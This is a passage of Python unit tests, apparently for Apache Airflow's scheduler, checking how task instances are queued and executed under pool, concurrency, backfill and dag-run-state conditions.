ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without a dag run still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
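# Scheduled task instances belonging to a backfill dag run are skipped by
# _find_executable_task_instances; the instance with no dag run and the one
# with a regular dag run are still returned.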
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
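# Pool 'a' has a single slot while pool 'b' has plenty, so only one of the two
# pool 'a' instances can be returned along with both pool 'b' instances.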
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
@mock_conf_get('core', 'non_pooled_task_slot_count', 1)
def test_find_executable_task_instances_in_non_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_in_non_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
t1 = DummyOperator(dag=dag, task_id='dummy1')
t2 = DummyOperator(dag=dag, task_id='dummy2')
dagbag = self._make_simple_dag_bag([dag])
executor = TestExecutor(do_update=True)
scheduler = SchedulerJob(executor=executor)
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
session = settings.Session()
ti1 = TI(task=t1, execution_date=dr1.execution_date)
ti2 = TI(task=t2, execution_date=dr2.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
# Two tasks w/o pool up for execution and our non_pool size is 1
res = scheduler._find_executable_task_instances(
dagbag,
states=(State.SCHEDULED,),
session=session)
self.assertEqual(1, len(res))
ti2.state = State.RUNNING
ti2.pool = Pool.default_pool_name
session.merge(ti2)
session.commit()
# One task w/o pool up for execution and one task running
res = scheduler._find_executable_task_instances(
dagbag,
states=(State.SCHEDULED,),
session=session)
self.assertEqual(0, len(res))
session.close()
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
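# DAG-level concurrency (2 here) caps how many instances are returned: with one
# already RUNNING only one SCHEDULED instance may be picked, and none once two
# are RUNNING.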
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
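# task_concurrency=2 on task1 caps how many of its instances can be selected
# across dag runs; the test steps through several state combinations, including
# a QUEUED instance sitting in executor.queued_tasks, to check the per-task limit.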
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
executor = TestExecutor(do_update=True)
scheduler = SchedulerJob(executor=executor)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_1.state = State.QUEUED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SUCCESS
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
executor.queued_tasks[ti1_1.key] = ti1_1
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED, State.QUEUED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
assert mock_queue_command.called
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency: previously,
# scheduler._execute_task_instances only checked the number of tasks once,
# so with a concurrency of 3 we could execute arbitrarily many tasks in the
# second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run and set both of its task instances to running
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency: previously,
# scheduler._execute_task_instances only checked the number of tasks once,
# so with a concurrency of 3 we could execute arbitrarily many tasks in the
# second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
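# ti3 has no dag run at all, so _change_state_for_tis_without_dagrun should
# reset it to NONE; the instances that belong to dr1/dr2 keep their states.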
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# persist the FAILED state on dr1 before re-running the check
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
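# Task instances left over in executor.queued_tasks are considered failed to
# execute: those still in QUEUED state are reset to SCHEDULED, while RUNNING
# ones are left alone.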
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor(do_update=False)
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor(do_update=False)
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exit the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor(do_update=False)
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGs.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
for tid, state in expected_task_states.items():
if state != State.FAILED:
continue
self.null_exec.mock_task_fail(dag_id, tid, ex_date)
try:
dag.run(start_date=ex_date, end_date=ex_date, executor=self.null_exec, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# TODO: this should live in test_dagrun.py
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dr = scheduler.create_dag_run(dag)
self.null_exec.mock_task_fail(dag_id, 'test_dagrun_fail', DEFAULT_DATE)
with self.assertRaises(AirflowException):
dag.run(start_date=dr.execution_date, end_date=dr.execution_date, executor=self.null_exec)
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite having an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_root_after_dagrun_unfinished(self):
"""
DagRuns with one successful and one future root task -> SUCCESS
Note: the DagRun state could still be in a running state during CI.
"""
dag_id = 'test_dagrun_states_root_future'
dag = self.dagbag.get_dag(dag_id)
scheduler = SchedulerJob(
dag_id,
num_runs=1,
executor=self.null_exec,
subdir=dag.fileloc)
scheduler.run()
first_run = DagRun.find(dag_id=dag_id, execution_date=DEFAULT_DATE)[0]
ti_ids = [(ti.task_id, ti.state) for ti in first_run.get_task_instances()]
self.assertEqual(ti_ids, [('current', State.SUCCESS)])
self.assertIn(first_run.state, [State.SUCCESS, State.RUNNING])
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
